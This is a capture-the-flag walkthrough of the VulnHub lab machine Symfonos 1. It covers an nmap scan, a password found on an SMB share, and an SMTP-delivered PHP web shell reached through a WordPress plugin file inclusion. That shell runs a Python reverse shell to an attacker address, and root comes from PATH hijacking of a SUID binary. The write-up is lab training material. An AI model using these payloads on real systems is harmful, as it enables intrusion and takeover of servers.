Symfonos 1 : VulnHub
https://www.vulnhub.com/entry/symfonos-1,322/
The box has an anonymous share that provides different passwords and allows us to spray those passwords. With this, we get the user credentials, which allows us to access the user’s share which has a route to a WordPress site. The WordPress site has vulnerable plugins that along with SMTP could be exploited to gain access to the box. The box has a SUID binary whose path could be hijacked to gain root access to the server.
Nmap Scan
# Nmap 7.60 scan initiated Mon Oct 11 11:27:46 2021 as: **nmap -sC -sV -A -o nmap --min-rate=5000 192.168.10.80**
Nmap scan report for 192.168.10.80
Host is up (0.012s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
**22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)**
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
**25/tcp open smtp Postfix smtpd**
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
**80/tcp open http Apache httpd 2.4.25 ((Debian))**
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
**139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)**
**445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)**
MAC Address: 08:00:27:37:CE:1A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2021-10-11T00:43:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-11 11:28:00
|_ start_date: 1601-01-01 05:41:16
TRACEROUTE
HOP RTT ADDRESS
1 11.61 ms 192.168.10.80
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 11 11:28:21 2021 -- 1 IP address (1 host up) scanned in 35.98 seconds
HTTP
Port 80 has a static site, that is of no use. Enumerating the directory provides no additional information.
SMB
IP’s changed(DHCP)
❯ smbclient -L \\192.168.10.68\
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\roshan's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
**helios Disk Helios personal share**
**anonymous Disk**
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
Anonymous share
❯ smbclient \\\\192.168.10.68\\anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\roshan's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jun 29 06:59:49 2019
.. D 0 Sat Jun 29 06:57:15 2019
attention.txt N 154 Sat Jun 29 06:59:49 2019
19994224 blocks of size 1024. 17238604 blocks available
Content of attention.txt
❯ cat attention.txt
Can users please stop using passwords like **'epidioko', 'qwerty' and 'baseball'!**
Next person I find using one of these passwords will be fired!
-Zeus
Basically shows the possible passwords : epidioko , qwerty and baseball
Also possible users : zeus,helios
Helios Share
There is only read access on the shares
We find the password of the Helios to be qwerty
❯ smbclient \\\\192.168.10.68\\Helios -U Helios
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\Helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jun 29 06:17:05 2019
.. D 0 Mon Oct 18 18:22:56 2021
**research.txt A 432 Sat Jun 29 06:17:05 2019
todo.txt A 52 Sat Jun 29 06:17:05 2019**
Contents of the files
❯ cat todo.txt research.txt
1. Binge watch Dexter
2. Dance
**3. Work on /h3l105**
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World
We have a different route h3l105
/h3l105
This is a wordpress site. So let’s start a wpscan
$ wpscan --url http://symfonos.local/h3l105/ -e ap,u
-e enumerate
ap all plugins
u all users
This gives us two plugins which are both vulnerable to LFI
[i] Plugin(s) Identified:
**[+] mail-masta**
| Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
**| Latest Version: 1.0 (up to date)**
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
**[+] site-editor**
| Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
**| Latest Version: 1.1.1 (up to date)**
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt
LFI to RCE
Tried different method to read files so that these files could contain malicious PHP code that I could execute.
Could not find any such files. Later realized that port 25 is open suggesting us to read the mail
Sending malicious content in the mail
telnet symfonos.local 25
> MAIL FROM:test
> RCPT TO:helios
> data
<?php system($_GET['cmd']); ?>
.
> quit
Now helios users mailbox has the malicious payload. We can read this using the LFI found in the plugins
[http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.67",8181)](http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.67%22,8181)));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
pl parameter has the file to read, in this case mail of user helios
cmd has the command to run, in this case a python reverse shell
Inside the box
There is a binary with suid set
helios@symfonos:/home/helios$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
**/opt/statuscheck**
/bin/mount
/bin/umount
/bin/su
/bin/ping
This binary is somewhat different. Let’s have a look at it
**helios@symfonos:/opt$ file statuscheck**
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
**helios@symfonos:/opt$ strings statuscheck**
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
**curl -I H
http://lH
ocalhostH**
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
prog.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
Here we can see curl is called with relative path. So we could hijack the path to get the shell as root user.
helios@symfonos:/tmp$ cat curl
/bin/bash -p
helios@symfonos:/tmp$ PATH=$(pwd):$PATH
helios@symfonos:/tmp$ /opt/statuscheck
**bash-4.4# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)**
bash-4.4# ls -la /root/
total 24
drwx------ 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 22 root root 4096 Jun 28 2019 ..
lrwxrwxrwx 1 root root 9 Jun 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Jun 28 2019 .selected_editor
**-rw-r--r-- 1 root root 1735 Jun 28 2019 proof.txt**
Mitigations
Make sure that the internal files are shared with better proper controls.
Make sure that the absolute path of dependent binaries is used in the binaries used.
